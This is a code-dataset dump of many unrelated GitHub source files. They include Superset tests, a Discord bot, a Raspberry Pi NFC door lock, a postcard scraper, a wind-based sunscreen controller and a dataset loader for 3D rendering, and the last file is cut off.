[{\"user_id\": 1, \"username\": \"a\"}, {\"user_id\": 2, \"username\": \"b\"}],\n )\n\n def test_nullable_bool(self):\n data = [(None,), (True,), (None,), (None,), (None,), (None,)]\n cursor_descr = [(\"is_test\", \"bool\", None, None, None, None, True)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"BOOL\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [\n {\"is_test\": None},\n {\"is_test\": True},\n {\"is_test\": None},\n {\"is_test\": None},\n {\"is_test\": None},\n {\"is_test\": None},\n ],\n )\n\n def test_nested_types(self):\n data = [\n (\n 4,\n [{\"table_name\": \"unicode_test\", \"database_id\": 1}],\n [1, 2, 3],\n {\"chart_name\": \"scatter\"},\n ),\n (\n 3,\n [{\"table_name\": \"birth_names\", \"database_id\": 1}],\n [4, 5, 6],\n {\"chart_name\": \"plot\"},\n ),\n ]\n cursor_descr = [(\"id\",), (\"dict_arr\",), (\"num_arr\",), (\"map_col\",)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"INT\")\n self.assertEqual(results.columns[1][\"type\"], \"STRING\")\n self.assertEqual(results.columns[2][\"type\"], \"STRING\")\n self.assertEqual(results.columns[3][\"type\"], \"STRING\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [\n {\n \"id\": 4,\n \"dict_arr\": '[{\"table_name\": \"unicode_test\", \"database_id\": 1}]',\n \"num_arr\": \"[1, 2, 3]\",\n \"map_col\": \"{'chart_name': 'scatter'}\",\n },\n {\n \"id\": 3,\n \"dict_arr\": '[{\"table_name\": \"birth_names\", \"database_id\": 1}]',\n \"num_arr\": \"[4, 5, 6]\",\n \"map_col\": \"{'chart_name': 'plot'}\",\n },\n ],\n )\n\n def test_single_column_multidim_nested_types(self):\n data = [\n (\n [\n \"test\",\n [\n [\n \"foo\",\n 123456,\n [\n [[\"test\"], 3432546, 7657658766],\n [[\"fake\"], 656756765, 324324324324],\n ],\n ]\n ],\n [\"test2\", 43, 765765765],\n None,\n None,\n ],\n )\n ]\n cursor_descr = [(\"metadata\",)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"STRING\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [\n {\n \"metadata\": '[\"test\", [[\"foo\", 123456, [[[\"test\"], 3432546, 7657658766], [[\"fake\"], 656756765, 324324324324]]]], [\"test2\", 43, 765765765], null, null]'\n }\n ],\n )\n\n def test_nested_list_types(self):\n data = [([{\"TestKey\": [123456, \"foo\"]}],)]\n cursor_descr = [(\"metadata\",)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"STRING\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df), [{\"metadata\": '[{\"TestKey\": [123456, \"foo\"]}]'}]\n )\n\n def test_empty_datetime(self):\n data = [(None,)]\n cursor_descr = [(\"ds\", \"timestamp\", None, None, None, None, True)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"TIMESTAMP\")\n\n def test_no_type_coercion(self):\n data = [(\"a\", 1), (\"b\", 2)]\n cursor_descr = [\n (\"one\", \"varchar\", None, None, None, None, True),\n (\"two\", \"int\", None, None, None, None, True),\n ]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"VARCHAR\")\n self.assertEqual(results.columns[1][\"type\"], \"INT\")\n\n def test_empty_data(self):\n data = []\n cursor_descr = [\n (\"emptyone\", \"varchar\", None, None, None, None, True),\n (\"emptytwo\", \"int\", None, None, None, None, True),\n ]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns, [])\n","repo_name":"apache/superset","sub_path":"tests/integration_tests/result_set_tests.py","file_name":"result_set_tests.py","file_ext":"py","file_size_in_byte":9376,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"5696740956","text":"from collections import defaultdict\nimport sys\n\nn = int(sys.stdin.readline())\nperson = list(map(int, sys.stdin.readline().split()))\ngraph = defaultdict(list)\nfor i in range(n) :\n a = list(map(int, sys.stdin.readline().split()))\n graph[i+1] = a[1:]\n\nprint(graph)\n\nmini = 10000000000\n\ndef dfs1(index) :\n global mini\n visit[index] = 1\n temp = visit[:]\n if check(temp) :\n a ,b = 0,0\n for i in range(1,n+1) :\n if visit[i] == 0 : a += person[i-1]\n else : b += person[i-1]\n mini = min(mini,abs(a-b))\n # 검증 - 나머지 선거구가 전부 이어지는지 검증\n # 이어진다면 인구 차이 구하기\n\n for i in graph[index] :\n if visit[i] == 0 :\n dfs1(i)\n visit[i] = 0\n\n\ndef check(temp) :\n for i in range(1,n+1) :\n if temp[i] == 0 :\n dfs(i,temp)\n if 0 in temp : return False\n return True \n return False\n\ndef dfs(v,seen):\n seen[v] = 1\n for i in graph[v] :\n if seen[i] == 0:\n dfs(i,seen)\n\nfor i in range(1,n+1) :\n # print(i)\n visit = [0] * (n+1)\n visit[0] = 1\n dfs1(i)\n\nif mini == 10000000000 :\n print(-1)\nelse : print(mini)","repo_name":"wnsrb003/backjunTEST","sub_path":"6월/17471.py","file_name":"17471.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41518604843","text":"# This runs as a standalone script (every minute) and as part of the module (every 20 minutes)\n\nimport requests\nimport json\nfrom .GetSecrets import append_json, write_json, get_secrets\nfrom SunScreenServer.ScreenMover import move_sunscreen\nfrom datetime import datetime,timedelta\n\nsecrets = get_secrets()\n\ndef check_array_high_wind(wind_speed_arr):\n if(secrets['LOGGING']):\n print('Wind speeds:', wind_speed_arr)\n return wind_speed_arr[3] >= secrets['HIGH_WIND_DIRECT_MEASUREMENT']\n\ndef get_data():\n windMosUrl = \"http://\"+secrets['WINDMOSIP']+\"/counter\"\n r = requests.get(windMosUrl)\n return r.json()\n\ndef screen_should_close():\n if(secrets['DIRECT_MEASUREMENT_ENABLED']):\n try:\n json_buffer = get_data()\n if(secrets['LOGGING']):\n print(check_array_high_wind(json_buffer['averages']))\n print(check_last_25_minutes_had_high_winds())\n result = check_array_high_wind(json_buffer['averages']) or check_last_25_minutes_had_high_winds()\n return result\n except:\n return True\n else:\n return False\n\n\ndef post_to_adafruit():\n json_buffer = get_data()\n adafruitFeed = secrets['ADAFRUIT_IO_FEEDS_URL'] + \"wind/data\"\n headers = {'X-AIO-Key': secrets['ADAFRUIT_IO_KEY'], \"Content-Type\": \"application/json\"}\n payload = {'value':json_buffer['averages'][3] }\n\n r = requests.post(adafruitFeed, json=payload, headers=headers)\n\ndef check_last_25_minutes_had_high_winds(test_json_string=False):\n if test_json_string:\n print(test_json_string)\n json_buff = json.loads(test_json_string)\n else:\n start_time = (datetime.utcnow() - timedelta(minutes=secrets['DIRECT_MEASUREMENT_LOOKBACK_MINUTES'])).isoformat()\n adafruitFeed = secrets['ADAFRUIT_IO_FEEDS_URL'] + \"wind/data?start_time=\" + start_time\n headers = {'X-AIO-Key': secrets['ADAFRUIT_IO_KEY']}\n\n r = requests.get(adafruitFeed, headers=headers)\n json_buff = r.json()\n\n if(secrets['LOGGING']):\n print('Adafruit loaded!')\n print(json_buff)\n wind_check = any(float(x['value']) >= secrets['HIGH_WIND_DIRECT_MEASUREMENT'] for x in json_buff)\n if(secrets['LOGGING']):\n print('Adafruit Wind check result')\n print(wind_check)\n return wind_check\n\n# print(r.text)\n","repo_name":"jcjveraa/sunscreen-controller","sub_path":"server_script/SunScreenServer/Windmanager.py","file_name":"Windmanager.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22752651114","text":"# Author : Bayu Aditya\nimport pandas as pd\n\ndef concatenate_atom_orbital(atomic_position, orbital_index, a, b, c):\n \"\"\"Menggabungkan dataframe dari file \"atomic_position\" dan \"orbital_index\".\n \n Example:\n INPUT\n a = 1.0\n b = 1.0\n c = 1.0\n atomic_position\n | atom | posX | posY | posZ |\n +------+------+------+------+\n | Sra | 0.0 | 0.0 | 0.0 |\n | Nb | 0.5 | 0.5 | 0.5 |\n orbital_index\n | atom | n | orbital | orbital_index |\n +------+---+---------+---------------+\n | Sra | 4 | s | 1 |\n | Sra | 3 | px | 2 |\n | Sra | 3 | py | 3 |\n | Sra | 3 | pz | 4 |\n | Nb | 4 | s | 5 |\n OUTPUT\n OrbitalA\n |A | Ax | Ay | Az |\n +---+----+------+-------+\n |1\t|0.0 |\t0.0 |\t0.0 |\n |2\t|0.0 |\t0.0 |\t0.0 |\n |3\t|0.0 |\t0.0 |\t0.0 |\n |4\t|0.0 |\t0.0 |\t0.0 |\n |5\t|0.5 |\t0.5 |\t0.5 |\n OrbitalB\n |B | Bx | By | Bz |\n +---+----+------+-------+\n |1\t|0.0 |\t0.0 |\t0.0 |\n |2\t|0.0 |\t0.0 |\t0.0 |\n |3\t|0.0 |\t0.0 |\t0.0 |\n |4\t|0.0 |\t0.0 |\t0.0 |\n |5\t|0.5 |\t0.5 |\t0.5 |\n \n Arguments:\n atomic_position {str} -- lokasi file atomic_position\n orbital_index {str} -- lokasi file orbital_index\n a {numpy.float64} -- lattice parameter arah X\n b {numpy.float64} -- lattice parameter arah Y\n c {numpy.float64} -- lattice parameter arah Z\n \n Returns:\n tuple -- tuple ukuran [2,] dengan tuple[0] dan tuple[1] merupakan pandas.DataFrame\n \"\"\"\n # read dataframe\n atom = pd.read_csv(atomic_position) # position atoms\n orbital = pd.read_csv(orbital_index) # orbital indexs\n # merge dataframe\n atom_orbital = orbital.merge(atom)\n # only choose certain columns\n atom_orbital = atom_orbital[[\"orbital_index\", \"posX\", \"posY\", \"posZ\"]]\n # times positions with lattice parameter\n atom_orbital[\"posX\"] = atom_orbital[\"posX\"]*a\n atom_orbital[\"posY\"] = atom_orbital[\"posY\"]*b\n atom_orbital[\"posZ\"] = atom_orbital[\"posZ\"]*c\n # create new dataframe and rename columns\n orbitalA, orbitalB = atom_orbital.copy(), atom_orbital.copy()\n orbitalA.columns = [\"A\", \"Ax\", \"Ay\", \"Az\"]\n orbitalB.columns = [\"B\", \"Bx\", \"By\", \"Bz\"]\n return orbitalA, orbitalB","repo_name":"bayu-aditya/Undergraduate_Thesis","sub_path":"Tight_Binding/src/concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7077867655","text":"from bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\nimport re\n\ndf = pd.DataFrame(columns=[\"Pais destinatário\",\"Tempo\",\"Distancia\",\"Envio\",\"Chegada\",\"ID\"])\ndados = []\n\ndef pegar_dados(link):\n html_text = requests.get(link).text\n soup = BeautifulSoup(html_text, 'lxml')\n\n if soup.find(\"i\",{\"class\":\"icn-mini r15\"}) != None:\n tempo = soup.find(\"i\",{\"class\":\"icn-mini r15\"}).next_sibling.text.replace(\"\\n\", \"\").replace(\" \", \"\")\n distancia = soup.find(\"i\", {\"class\": \"icn-mini r4\"}).next_sibling.text.replace(\"\\n\", \"\").replace(\" \", \"\").replace(\" \", \"\")\n pais_destinatario = soup.find_all('a',itemprop=\"addressCountry\")[1].text\n envio = soup.find('time',itemprop=\"startTime\").text\n chegada = soup.find('time',itemprop=\"endTime\").text\n return [pais_destinatario,distancia,tempo,envio,chegada]\n\nfor i in range(5000):\n if pegar_dados(f\"\"\"https://www.postcrossing.com/postcards/NL-{5395682-i}\"\"\") != None:\n dados = pegar_dados(f\"\"\"https://www.postcrossing.com/postcards/NL-{5395682-i}\"\"\")\n dados.append(5395682 - i)\n df.loc[len(df)] = dados\n print(f\"\"\"{i}/5000\"\"\")\ndf.to_excel(r'YourAddress.xlsx', index=False)","repo_name":"DaniloSucomine/PostCrossing-WebScrapping","sub_path":"PostCrossing Data.py","file_name":"PostCrossing Data.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12528498983","text":"from mfm_learner.utils import utils\nutils.init_logger()\nfrom mfm_learner.datasource import datasource_factory\nfrom mfm_learner.example.factors.turnover_rate import TurnOverFactor\n\n\n# pytest test/unitest/test_turnover_rate_factor.py -s\ndef test_ivff():\n turnover_factor = TurnOverFactor()\n\n start_date = '20200101'\n end_date = '20200130'\n index_code = \"000905.SH\"\n stocks = datasource_factory.get().index_weight(index_code, start_date)\n stocks = stocks[:5]\n df = turnover_factor.calculate(stocks, start_date, end_date)\n df = df.reset_index()\n df = df.set_index(['datetime','code'])\n df = df.unstack('code')\n print(df)\n","repo_name":"piginzoo/mfm_learner","sub_path":"test/unitest/test_turnover_rate_factor.py","file_name":"test_turnover_rate_factor.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"61"} +{"seq_id":"17493752099","text":"#read txt method three\nf2 = open(\"/home/sgl/bwhe/DNSGrep/fdns_a/record.txt\",\"r\")\nlines = f2.readlines()\nprint(\"00000000000000000000000000000000\")\nfor i in range(len(lines)):\n if(i%3==0):\n s1=\";\"+lines[i][4:-5]\n if(i%3==1):\n print(lines[i][:-1]+s1)\n\n","repo_name":"hebowen325/dual_stack_data","sub_path":"server_data/chrecord.py","file_name":"chrecord.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11097962364","text":"import pickle\n\n\ndef write_to_text_file(d, file_path):\n \"\"\"\n Writes the dict to a file in a more readable format (debug mostly)\n :param file_path: filepath, where to write\n :param d: dictonary\n :return:\n \"\"\"\n with open(file_path, \"w\") as file_handler:\n for key, rooms in d.items():\n file_handler.write(key + \": \" + str(len(rooms)) + \" rooms\\n\")\n for room in rooms:\n if type(room) != str:\n continue\n file_handler.write(\" \" + room + \"\\n\")\n file_handler.write(\"\\n\")\n\n return True\n\n\nif __name__ == \"__main__\":\n to_pickle_file = open(\"saved_files/rooms_by_school_file\", \"rb\")\n rooms_by_school_dict = pickle.load(to_pickle_file)\n\n for test_key, test_rooms in rooms_by_school_dict.items():\n print(test_key + \":\", len(test_rooms), \"rooms\")\n for test_room in test_rooms:\n print(\" \", test_room)\n print()\n write_to_text_file(rooms_by_school_dict, \"saved_files/rooms_by_school_pretty\")\n","repo_name":"EmilUpp/skola24_scraper","sub_path":"reading_test.py","file_name":"reading_test.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15616210167","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass fun(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Fun Commands Ready!\")\n \n @commands.command()\n async def magic8ball(self, ctx, *, question):\n ballresponses = ['Yes', 'No', 'It is certain', 'It is decidedly so', 'Without a doubt', 'Yes - definitely', 'You may rely on it', 'As I see it, yes', 'Most likely', 'Outlook good', 'Signs point to yes', 'Reply hazy', 'try again', 'Ask again later', 'Better not tell you now', 'Cannot predict now', 'Affirmative', 'Dont count on it', 'My reply is no', 'My sources say no', 'Outlook not so good', 'Very doubtful']\n await ctx.send(f\"Question: {question}\\nAnswer: {random.choice(ballresponses)}\")\n \n @commands.command()\n async def rps_rock(self, ctx):\n user_choice = \"rock\"\n bot_choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n if bot_choice == user_choice:\n await ctx.send(\"It's a tie!\")\n elif bot_choice == \"paper\":\n await ctx.send(\"YES! I win! Paper beats rock!\")\n elif bot_choice == \"scissors\":\n await ctx.send(\"NOOOO! You win! Rock beats scissors!\")\n \n @commands.command()\n async def rps_paper(self, ctx):\n user_choice = \"paper\"\n bot_choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n if bot_choice == user_choice:\n await ctx.send(\"It's a tie!\")\n elif bot_choice == \"scissors\":\n await ctx.send(\"YES! I win! Scissors beats paper!\")\n elif bot_choice == \"rock\":\n await ctx.send(\"NOOOO! You win! Paper beats rock!\")\n \n @commands.command()\n async def rps_scissors(self, ctx):\n user_choice = \"scissors\"\n bot_choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n if bot_choice == user_choice:\n await ctx.send(\"It's a tie!\")\n elif bot_choice == \"rock\":\n await ctx.send(\"YES! I win! Rock beats scissors!\")\n elif bot_choice == \"paper\":\n await ctx.send(\"NOOOO! You win! Scissors beats paper!\")\n\n @commands.command()\n async def flip(self, ctx):\n choice = random.choice([\"heads\", \"tails\"])\n if choice == \"heads\":\n await ctx.send(\"It's heads!\")\n elif choice == \"tails\":\n await ctx.send(\"It's tails!\")\n \n @commands.command()\n async def say(self, ctx, *, message):\n await ctx.send(message)\n \n @commands.command()\n async def sayembed(self, ctx, *, message):\n await ctx.send(embed=discord.Embed(description=message))\n\n @commands.command()\n async def diceroll(self, ctx):\n dice = random.randint(1, 6)\n await ctx.send(f\"You rolled a {dice}!\")\n\nasync def setup(bot):\n await bot.add_cog(fun(bot))","repo_name":"jmalik6209/discord-bot","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27684806402","text":"from enum import Enum, auto\nimport json\nimport requests\n\n\nclass TestGroup:\n \"\"\"\n TestGroup defines a set of tests to be run for a specific application.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.application = kwargs[\"application\"]\n self.name = kwargs[\"name\"]\n self.slack_message = SlackMessage(text=\"\")\n self.tests = kwargs[\"tests\"]\n\n\nclass Request:\n \"\"\"\n Request defines a python [request] object.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.method = kwargs[\"method\"]\n self.url = kwargs[\"url\"]\n self.payload = kwargs.get(\"payload\")\n\n def call(self):\n if self.method == \"GET\":\n return requests.get(self.url, params=self.payload, timeout=15)\n if self.method == \"POST\":\n return requests.post(self.url, json=self.payload, timeout=15)\n\n # More method types can be added here...\n raise Exception(\"Unsupported method type!\")\n\n\nclass Result(Enum):\n \"\"\"\n Result defines the result of running a test.\n \"\"\"\n\n SUCCESS = auto()\n ERROR = auto()\n TIMEOUT = auto()\n\n\nclass Application(Enum):\n \"\"\"\n Application defines which application a test group belongs to.\n \"\"\"\n\n EATERY = auto()\n TRANSIT = auto()\n UPLIFT = auto()\n COURSEGRAB = auto()\n VOLUME = auto()\n\n\nclass Test:\n \"\"\"\n Test defines a test object, with an optional closure. More information on [closure] is\n specified below.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.name = kwargs[\"name\"]\n self.request = kwargs[\"request\"]\n\n # An optional closure. This allows a user to define a function [f: request -> bool]\n # to perform any additional operations. For example, a user could check the format\n # of a response, or verify that certain data is included.\n # If the value is not provided, a lambda that returns True is the default.\n self.callback = kwargs.get(\"callback\", lambda r: True)\n\n def get_result(self):\n try:\n r = self.request.call()\n if r.status_code == 200 and self.callback(r):\n return Result.SUCCESS\n return Result.ERROR\n except requests.exceptions.Timeout:\n return Result.TIMEOUT\n except requests.exceptions.RequestException:\n return Result.ERROR\n\n\nclass SlackMessage:\n \"\"\"\n SlackMessage defines a slack message object which contains information on whether a\n message should send and the contents of the message.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.text = kwargs[\"text\"]\n self.should_send = True\n\n\nclass Config:\n \"\"\"\n Config defines a configuration for each tested app containing whether the app tests\n are , , or . Note: In main.py, apps that are mapped to will be\n tested but will not ping slack users. If the tests succeed, then the app will\n be mapped to .\n \"\"\"\n\n SETTINGS = [\"ON\", \"OFF\", \"FAILED\"]\n\n def __init__(self, config):\n self._config = {}\n config = config.replace(\"{\",\"\").replace(\"}\",\"\").split(\",\")\n for c in config:\n c = c.strip().replace(\"\\\"\",\"\")\n k, v = c.split(\": \")\n self._config[k] = v\n\n @classmethod\n def create_default_config(cls, test_groups):\n default_json = json.dumps({app.name: \"ON\" for app in test_groups})\n return cls(default_json)\n\n def __len__(self):\n return len(self._config)\n\n def __str__(self):\n return json.dumps(self._config)\n\n def get(self, app_name):\n return self._config.get(app_name)\n\n def set(self, app_name, setting):\n if setting in self.SETTINGS and app_name in self._config.keys():\n self._config[app_name] = setting\n return True\n else:\n return False\n","repo_name":"cuappdev/integration","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33075372783","text":"#Zara Paul \n#write code that finds an input number to be even or odd \n\n\nimport os\nos .system('clear')\n\nvariable= input('enter a number') #put number in \nnum=int(variable) #number is integer \nprint(num) #prints the 1 or the 0 \nif num%2 == 0: \n print ('you are even') \nelse: \n print('you are odd') \n\n\nif (num%3==0):\n print (\"number is a multiple of 3\" )\n\n\nif (num%5==0):\n print (\"number is a multiple of 5\" )\n\n","repo_name":"paulz25/Game-Design-Morning","sub_path":"pythonFIles/integersandfloats.py","file_name":"integersandfloats.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16908244136","text":"import numpy as np\nimport sys\nimport os\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(BASE_DIR))\n\nfrom _ext import lib, ffi\n\ndef find_nearest_point_idx(ref_pts, que_pts):\n assert(ref_pts.shape[1] == que_pts.shape[1] and 1 < que_pts.shape[1] <= 3)\n pn1 = ref_pts.shape[0]\n pn2 = que_pts.shape[0]\n dim = ref_pts.shape[1]\n\n ref_pts = np.ascontiguousarray(ref_pts[None,:,:], np.float32)\n que_pts = np.ascontiguousarray(que_pts[None,:,:], np.float32)\n idxs = np.zeros([1, pn2], np.int32)\n\n ref_pts_ptr = ffi.cast('float *', ref_pts.ctypes.data)\n que_pts_ptr = ffi.cast('float *', que_pts.ctypes.data)\n idxs_ptr = ffi.cast('int *', idxs.ctypes.data)\n lib.findNearestPointIdxLauncher(ref_pts_ptr, que_pts_ptr, idxs_ptr, 1, pn1, pn2, dim, 0)\n\n return idxs[0]\n","repo_name":"xingyul/stereobj-1m","sub_path":"evaluation/nn/nn_utils.py","file_name":"nn_utils.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"1496577649","text":"import numpy as np\n\ndef f(x, y):\n return x ** 3 + y ** 2 - x * 3 - y * 2 + 2\n\ndef gradient(x, y):\n df_dx = 3 * x ** 2 - 3\n df_dy = 2 * y - 2\n return np.array([df_dx, df_dy])\n\ndef gradient_descent(x0, epsilon1, epsilon2, M):\n x = np.array(x0)\n k = 0\n\n while True:\n grad = gradient(x[0], x[1])\n\n if np.linalg.norm(grad) < epsilon1:\n return x\n\n if k >= M:\n return x\n\n def f_gamma(gamma):\n return f(x[0] - gamma * grad[0], x[1] - gamma * grad[1])\n\n gamma_star = np.argmin([f_gamma(g) for g in np.linspace(0, 1, 100)])\n\n x_new = x - gamma_star * grad\n\n if (np.linalg.norm(x_new - x) <= epsilon2 and\n np.abs(f(x_new[0], x_new[1]) - f(x[0], x[1])) <= epsilon2):\n return x_new\n\n x = x_new\n k += 1\n\nx0 = [0, 0]\nepsilon1 = 1e-6\nepsilon2 = 1e-6\nM = 1000\n\nresult = gradient_descent(x0, epsilon1, epsilon2, M)\nprint(result)","repo_name":"Klok1305/optimization","sub_path":"Мусорка/метод наискорейшего градиентного спуска.py","file_name":"метод наискорейшего градиентного спуска.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1433935744","text":"import RPi.GPIO as GPIO\nimport time\nimport sys\nfrom util import servo, reader, LINENotifyBot\nimport os\n\nclass Locker(object):\n def __init__(self):\n #登録済みNFC IDの読み取り\n self.id_list = os.environ[\"NFC_ID\"].split(\":\")\n\n #GPIOピンをプルダウン入力に設定\n self.gp_in_yellow = 16\n self.gp_in_red = 25\n self.gp_in_green = 24\n self.gp_in_blue = 23\n\n #GPIO4を制御パルスの出力に設定\n self.gp_out = 4\n\n self.if_open = True\n\n #LINE Notify用のアクセストークン\n access_token = os.environ[\"LINE_NOTIFY_KEY\"]\n self.bot = LINENotifyBot(access_token=access_token)\n\n GPIO.setmode(GPIO.BCM)\n\n #アンロックピンのセットアップ\n GPIO.setup(self.gp_in_yellow, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_yellow, GPIO.RISING, callback=self.callback_open, bouncetime=1000)\n \n #ロックピンのセットアップ\n GPIO.setup(self.gp_in_red, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_red, GPIO.RISING, callback=self.callback_close, bouncetime=1000)\n\n #補助ピンAのセットアップ\n GPIO.setup(self.gp_in_green, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_green, GPIO.RISING, callback=self.callback_wait_lock, bouncetime=1000)\n\n #補助ピンBのセットアップ\n GPIO.setup(self.gp_in_blue, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_blue, GPIO.RISING, callback=self.callback_donki, bouncetime=1000)\n\n #出力ピンのセットアップ\n GPIO.setup(self.gp_out, GPIO.OUT)\n servo(self.gp_out, GPIO, 0)\n\n def exec(self):\n cr = reader(self.id_list)\n while True:\n try:\n cr.read_id()\n if self.if_open:\n self.callback_close(0)\n else:\n self.callback_open(0)\n\n except KeyboardInterrupt: #Ctrl+Cキーが押して,\n GPIO.cleanup() #GPIOをクリーンアップし,\n sys.exit() #プログラムを終了\n\n def callback_open(self, channel):\n servo(self.gp_out, GPIO, 90) #サーボモータを90度に動作\n servo(self.gp_out, GPIO, 0) #サーボモータを0度に動作\n self.if_open = True\n self.bot.send(message = \"解錠しました\")\n\n def callback_close(self, channel):\n servo(self.gp_out, GPIO, -90) #サーボモータを-90度に動作\n servo(self.gp_out, GPIO, 0) #サーボモータを0度に動作\n self.if_open = False\n self.bot.send(message = \"施錠しました\")\n\n def callback_costco(self, channel):\n self.bot.send(message = \"Costco行かね?\")\n\n def callback_donki(self, channel):\n self.bot.send(message = \"ドンキ行かね?\")\n\n def callback_wait_lock(self, channel):\n self.bot.send(message = \"5秒後に施錠します\")\n time.sleep(5)\n self.callback_close(0)\n\nif __name__ == \"__main__\":\n locker = Locker()\n locker.exec()","repo_name":"kumagaimasahito/auto-locker-pi","sub_path":"src/auto-locker-pi/autoLocker.py","file_name":"autoLocker.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74183739713","text":"import torch\nimport torch.nn.functional as F\nimport cv2 as cv\nimport numpy as np\nimport os\nfrom glob import glob\nfrom scipy.spatial.transform import Rotation as Rot\nfrom scipy.spatial.transform import Slerp\nfrom tqdm import tqdm\n\n\n# This function is borrowed from IDR: https://github.com/lioryariv/idr\ndef load_K_Rt_from_P(filename, P=None):\n if P is None:\n lines = open(filename).read().splitlines()\n if len(lines) == 4:\n lines = lines[1:]\n lines = [[x[0], x[1], x[2], x[3]] for x in (x.split(\" \") for x in lines)]\n P = np.asarray(lines).astype(np.float32).squeeze()\n\n out = cv.decomposeProjectionMatrix(P)\n K = out[0]\n R = out[1]\n t = out[2]\n\n K = K / K[2, 2]\n intrinsics = np.eye(4)\n intrinsics[:3, :3] = K\n\n pose = np.eye(4, dtype=np.float32)\n pose[:3, :3] = R.transpose()\n pose[:3, 3] = (t[:3] / t[3])[:, 0]\n\n return intrinsics, pose\n\n\nclass Dataset:\n def __init__(self, conf):\n super(Dataset, self).__init__()\n print('Load data: Begin')\n self.device = torch.device('cuda')\n self.conf = conf\n\n self.data_dir = conf.get_string('data_dir')\n self.render_cameras_name = conf.get_string('render_cameras_name')\n self.object_cameras_name = conf.get_string('object_cameras_name')\n\n self.camera_outside_sphere = conf.get_bool('camera_outside_sphere', default=True)\n self.scale_mat_scale = conf.get_float('scale_mat_scale', default=1.1)\n self.near = conf.get_float('near', default=-1)\n self.far = conf.get_float('far', default=-1)\n self.n_frames = conf.get_int('n_frames', default=128)\n\n camera_dict = np.load(os.path.join(self.data_dir, self.render_cameras_name))\n self.camera_dict = camera_dict\n self.images_lis = sorted(glob(os.path.join(self.data_dir, 'image/*.png')))\n self.n_images = len(self.images_lis)\n self.images_np = np.stack([cv.imread(im_name) for im_name in self.images_lis]) / 256.0\n self.masks_lis = sorted(glob(os.path.join(self.data_dir, 'mask/*.png')))\n self.masks_np = np.stack([cv.imread(im_name) for im_name in self.masks_lis]) / 256.0\n\n # world_mat is a projection matrix from world to image\n self.world_mats_np = [camera_dict['world_mat_%d' % idx].astype(np.float32) for idx in range(self.n_images)]\n self.fid_list = [torch.LongTensor(np.array([camera_dict['fid_%d' % idx]])) for idx in range(self.n_images)]\n self.scale_mats_np = []\n\n # scale_mat: used for coordinate normalization, we assume the scene to render is inside a unit sphere at origin.\n self.scale_mats_np = [camera_dict['scale_mat_%d' % idx].astype(np.float32) for idx in range(self.n_images)]\n\n self.intrinsics_all = []\n self.pose_all = []\n self.proj_all = []\n\n for scale_mat, world_mat in 